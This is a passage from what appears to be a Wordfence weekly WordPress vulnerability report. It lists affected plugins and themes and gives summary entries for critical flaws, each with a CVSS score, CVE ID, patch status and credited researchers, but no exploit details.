<td>Use-your-Drive | Google Drive plugin for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/use-your-drive" target="_blank" rel="noopener">use-your-drive</a>
		</td>
</tr>
<tr>
<td>User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration" target="_blank" rel="noopener">user-registration</a>
		</td>
</tr>
<tr>
<td>UsersWP – Social Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/userswp-social-login" target="_blank" rel="noopener">userswp-social-login</a>
		</td>
</tr>
<tr>
<td>VikBooking Hotel Booking Engine &amp; PMS</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vikbooking" target="_blank" rel="noopener">vikbooking</a>
		</td>
</tr>
<tr>
<td>VikRentItems Flexible Rental Management System</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vikrentitems" target="_blank" rel="noopener">vikrentitems</a>
		</td>
</tr>
<tr>
<td>Visitor Traffic Real Time Statistics pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visitors-traffic-real-time-statistics-pro" target="_blank" rel="noopener">visitors-traffic-real-time-statistics-pro</a>
		</td>
</tr>
<tr>
<td>Visualizer – Tables &amp; Charts Manager with Built-in AI Generator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visualizer" target="_blank" rel="noopener">visualizer</a>
		</td>
</tr>
<tr>
<td>VK All in One Expansion Unit</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vk-all-in-one-expansion-unit" target="_blank" rel="noopener">vk-all-in-one-expansion-unit</a>
		</td>
</tr>
<tr>
<td>WC Vendors – WooCommerce Multivendor, WooCommerce Marketplace, Product Vendors</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-vendors" target="_blank" rel="noopener">wc-vendors</a>
		</td>
</tr>
<tr>
<td>WCFM Marketplace – Multivendor Marketplace for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-multivendor-marketplace" target="_blank" rel="noopener">wc-multivendor-marketplace</a>
		</td>
</tr>
<tr>
<td>Web to Print Online Designer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/web-to-print-online-designer" target="_blank" rel="noopener">web-to-print-online-designer</a>
		</td>
</tr>
<tr>
<td>WordLift – AI powered SEO – Schema</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wordlift" target="_blank" rel="noopener">wordlift</a>
		</td>
</tr>
<tr>
<td>Wow Elements Addons for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wow-elements-addons-for-elementor" target="_blank" rel="noopener">wow-elements-addons-for-elementor</a>
		</td>
</tr>
<tr>
<td>WP Cloud Plugins &#8211; Box (Lets-Box)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lets-box-2" target="_blank" rel="noopener">lets-box</a>
		</td>
</tr>
<tr>
<td>WP Cloud Plugins &#8211; Dropbox (Out-of-the-Box)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/out-of-the-box-2" target="_blank" rel="noopener">out-of-the-box</a>
		</td>
</tr>
<tr>
<td>WP Component</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpcomponent" target="_blank" rel="noopener">wpcomponent</a>
		</td>
</tr>
<tr>
<td>WP Composer – The Easiest Page Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/page-builder-wp" target="_blank" rel="noopener">page-builder-wp</a>
		</td>
</tr>
<tr>
<td>WP Customer Reviews</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-customer-reviews" target="_blank" rel="noopener">wp-customer-reviews</a>
		</td>
</tr>
<tr>
<td>WP Directory Kit</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdirectorykit" target="_blank" rel="noopener">wpdirectorykit</a>
		</td>
</tr>
<tr>
<td>WP Easy Pay – Payment and Donation Form Builder for Square</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-easy-pay" target="_blank" rel="noopener">wp-easy-pay</a>
		</td>
</tr>
<tr>
<td>WP images upload on piclect</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-images-upload-on-piclect" target="_blank" rel="noopener">wp-images-upload-on-piclect</a>
		</td>
</tr>
<tr>
<td>WP Import Export Lite</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-import-export-lite" target="_blank" rel="noopener">wp-import-export-lite</a>
		</td>
</tr>
<tr>
<td>WP Inventory Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-inventory-manager" target="_blank" rel="noopener">wp-inventory-manager</a>
		</td>
</tr>
<tr>
<td>WP Maps – Google Maps, OpenStreetMap, Mapbox, Store Locator with Search, Filters &amp; Listings</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-map-plugin" target="_blank" rel="noopener">wp-google-map-plugin</a>
		</td>
</tr>
<tr>
<td>WP Mega Menu</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-megamenu" target="_blank" rel="noopener">wp-megamenu</a>
		</td>
</tr>
<tr>
<td>WP Multi Store Locator Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-multi-store-locator-pro" target="_blank" rel="noopener">wp-multi-store-locator-pro</a>
		</td>
</tr>
<tr>
<td>WP Optimizer – PageSpeed, Cache, Minify &amp; Core Web Vitals</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-optimizer" target="_blank" rel="noopener">wp-optimizer</a>
		</td>
</tr>
<tr>
<td>WP Photo Album Plus</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-photo-album-plus" target="_blank" rel="noopener">wp-photo-album-plus</a>
		</td>
</tr>
<tr>
<td>WP Recipe Maker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-recipe-maker" target="_blank" rel="noopener">wp-recipe-maker</a>
		</td>
</tr>
<tr>
<td>wp shortcut link and advertisement baner</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-shortcut-link" target="_blank" rel="noopener">wp-shortcut-link</a>
		</td>
</tr>
<tr>
<td>WP-Lister Lite for eBay</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-lister-for-ebay" target="_blank" rel="noopener">wp-lister-for-ebay</a>
		</td>
</tr>
<tr>
<td>WP2Social Auto Publish</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/facebook-auto-publish" target="_blank" rel="noopener">facebook-auto-publish</a>
		</td>
</tr>
<tr>
<td>WPBot – AI ChatBot for Live Support, Lead Generation, WordPress Automation, AI Services</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">chatbot</a>
		</td>
</tr>
<tr>
<td>WPComplete</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpcomplete" target="_blank" rel="noopener">wpcomplete</a>
		</td>
</tr>
<tr>
<td>WPGraphQL Smart Cache</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpgraphql-smart-cache" target="_blank" rel="noopener">wpgraphql-smart-cache</a>
		</td>
</tr>
<tr>
<td>WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">gdpr-cookie-consent</a>
		</td>
</tr>
<tr>
<td>WPMasterToolKit (WPMTK) – All in one plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpmastertoolkit" target="_blank" rel="noopener">wpmastertoolkit</a>
		</td>
</tr>
<tr>
<td>wpShopGermany IT-RECHT KANZLEI</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpshopgermany-it-recht-kanzlei" target="_blank" rel="noopener">wpshopgermany-it-recht-kanzlei</a>
		</td>
</tr>
<tr>
<td>Xagio SEO &amp; AEO – AI SEO for Google Rankings &amp; AI Visibility</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/xagio-seo" target="_blank" rel="noopener">xagio-seo</a>
		</td>
</tr>
<tr>
<td>Xpro Addons — 150+ Widgets for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/xpro-elementor-addons" target="_blank" rel="noopener">xpro-elementor-addons</a>
		</td>
</tr>
<tr>
<td>YayPricing – WooCommerce Dynamic Pricing &amp; Discounts</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yaypricing" target="_blank" rel="noopener">yaypricing</a>
		</td>
</tr>
<tr>
<td>Yo</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yo" target="_blank" rel="noopener">yo</a>
		</td>
</tr>
<tr>
<td>Yogeta WP Cloud</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yogeta-wp-cloud" target="_blank" rel="noopener">yogeta-wp-cloud</a>
		</td>
</tr>
<tr>
<td>YouTube Embed – YouTube Gallery, Vimeo Gallery – WordPress Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/youram-youtube-embed" target="_blank" rel="noopener">youram-youtube-embed</a>
		</td>
</tr>
<tr>
<td>YS LeadGen – Drag and Drop Popup Builder, Form Builder, Exit Intent Popups &amp; Lead Capture for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ysleadgen" target="_blank" rel="noopener">ysleadgen</a>
		</td>
</tr>
<tr>
<td>Zonify – Amazon Product Importer for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/zonify" target="_blank" rel="noopener">zonify</a>
		</td>
</tr>
</table>
<hr>
<h3>WordPress Themes with Reported Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table software-list">
<tr>
<th class="text-center w-50">Software Name</th>
<th class="text-center">Software Slug</th>
</tr>
<tr>
<td>Bridge &#8211; Creative Multipurpose WordPress Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/bridge" target="_blank" rel="noopener">bridge</a>
		</td>
</tr>
<tr>
<td>Consulting &#8211; Business, Finance WordPress Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/consulting-business-finance-wordpress-theme" target="_blank" rel="noopener">consulting</a>
		</td>
</tr>
<tr>
<td>Divi</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/Divi" target="_blank" rel="noopener">Divi</a>
		</td>
</tr>
<tr>
<td>VW Writer Blog</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/vw-writer-blog" target="_blank" rel="noopener">vw-writer-blog</a>
		</td>
</tr>
</table>
<hr>
<h3>Vulnerability Details</h3>
<p>Please note that if you run the Wordfence plugin on your WordPress site, with the scanner enabled, you should’ve already been notified if your site was affected by any of these vulnerabilities. If you’d like to receive real-time notifications whenever a vulnerability is added to the Wordfence Intelligence Vulnerability Database, <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">check out our Slack and HTTP Webhook Integration</a>, which is completely free to utilize.</p>
</p>
<div class="wfvr-vulnerabilities">
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8898bae3-067c-4505-9a96-05b7a08d90c6" target="_blank" rel="noopener">Admin Menu Editor Pro 2.35 &#8211; 2.36 &#8211; Backdoored Software</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/admin-menu-editor-pro" target="_blank" rel="noopener">Admin Menu Editor Pro</a> <span class="wfvr-software-slug">[admin-menu-editor-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
									<strong>Researcher(s):</strong> Unknown
							</div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8898bae3-067c-4505-9a96-05b7a08d90c6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8a7a925-2b9e-43bc-b649-c7ec518e063c" target="_blank" rel="noopener">Advanced Custom Fields: Extended PRO &lt;= 0.9.2.6 &#8211; Unauthenticated Remote Code Execution via Dynamic Render Field Type</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-extended-pro" target="_blank" rel="noopener">Advanced Custom Fields: Extended PRO</a> <span class="wfvr-software-slug">[acf-extended-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8ec93bb7e5ec96ab4636699e413382c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8ec93bb7e5ec96ab4636699e413382c9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener">Tin Pham (TF1T)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trong-pham-dtro" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4418c9327e7455cc20ecc3238895e0d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4418c9327e7455cc20ecc3238895e0d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trong-pham-dtro" target="_blank" rel="noopener">Trong Pham (dtro)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hao-ngo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/686db785ef138a2df1f8279970662a2a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="686db785ef138a2df1f8279970662a2a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hao-ngo" target="_blank" rel="noopener">Hao Ngo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8a7a925-2b9e-43bc-b649-c7ec518e063c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d48aba0f-4655-4836-bc6c-c9c74339f758" target="_blank" rel="noopener">Choose User Role at Registration for WooCommerce &lt;= 1.3.2 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85128" target="_blank" rel="noopener noreferrer">							CVE-2026-85128						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/choose-user-role-at-registration" target="_blank" rel="noopener">Choose User Role at Registration for WooCommerce</a> <span class="wfvr-software-slug">[choose-user-role-at-registration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mike-gozdiskowski" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mike-gozdiskowski" target="_blank" rel="noopener">Mike Gozdiskowski</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d48aba0f-4655-4836-bc6c-c9c74339f758" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2851ac4b-a50d-45cd-a472-540932b46d06" target="_blank" rel="noopener">DS Ad Rotator &lt;= 0.8 &#8211; Unauthenticated Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81402" target="_blank" rel="noopener noreferrer">							CVE-2026-81402						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ds-adrotator" target="_blank" rel="noopener">DS Ad Rotator</a> <span class="wfvr-software-slug">[ds-adrotator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huynh-kien-minh-minhhk" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/fd2bb32309c445d4b78303e1a770ded0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fd2bb32309c445d4b78303e1a770ded0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huynh-kien-minh-minhhk" target="_blank" rel="noopener">Huynh Kien Minh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2851ac4b-a50d-45cd-a472-540932b46d06" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/787e22a9-329b-4e71-bc2a-4f5524fc9356" target="_blank" rel="noopener">Gravity Forms &lt;= 3.1.0.4 &#8211; Unauthenticated Arbitrary File Upload via Hidden File Upload Field</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84434" target="_blank" rel="noopener noreferrer">							CVE-2026-84434						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gravityforms" target="_blank" rel="noopener">Gravity Forms</a> <span class="wfvr-software-slug">[gravityforms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2a1b4c1c638eb4f66b0677e71058a830.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2a1b4c1c638eb4f66b0677e71058a830"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener">0xd4rk5id3</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/787e22a9-329b-4e71-bc2a-4f5524fc9356" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a61b2ecc-d4e1-4e71-9187-ddc3d3616a29" target="_blank" rel="noopener">JetFormBuilder &lt;= 3.6.2 &#8211; Unauthenticated Privilege Escalation via &#8216;_jet_engine_booking_form_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12793" target="_blank" rel="noopener noreferrer">							CVE-2026-12793						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jetformbuilder" target="_blank" rel="noopener">JetFormBuilder — Dynamic Blocks Form Builder</a> <span class="wfvr-software-slug">[jetformbuilder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a61b2ecc-d4e1-4e71-9187-ddc3d3616a29" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e6553417-cb3d-40f4-b2ac-acd2d8d04f14" target="_blank" rel="noopener">Login with QR &lt;= 1.0.0 &#8211; Authentication Bypass</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86710" target="_blank" rel="noopener noreferrer">							CVE-2026-86710						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/login-with-qr" target="_blank" rel="noopener">Login with QR</a> <span class="wfvr-software-slug">[login-with-qr]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e126a9af211881ed6f11a71a84286fbe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e126a9af211881ed6f11a71a84286fbe"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener">Naoki Kawahigashi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e6553417-cb3d-40f4-b2ac-acd2d8d04f14" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a19c70d1-30d6-4d87-92a7-46841951e1c7" target="_blank" rel="noopener">Migratico Lite &lt;= 2.6.8 &#8211; Unauthenticated Remote Code Execution</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62104" target="_blank" rel="noopener noreferrer">							CVE-2026-62104						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/migratico-lite" target="_blank" rel="noopener">Migratico Lite</a> <span class="wfvr-software-slug">[migratico-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a19c70d1-30d6-4d87-92a7-46841951e1c7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
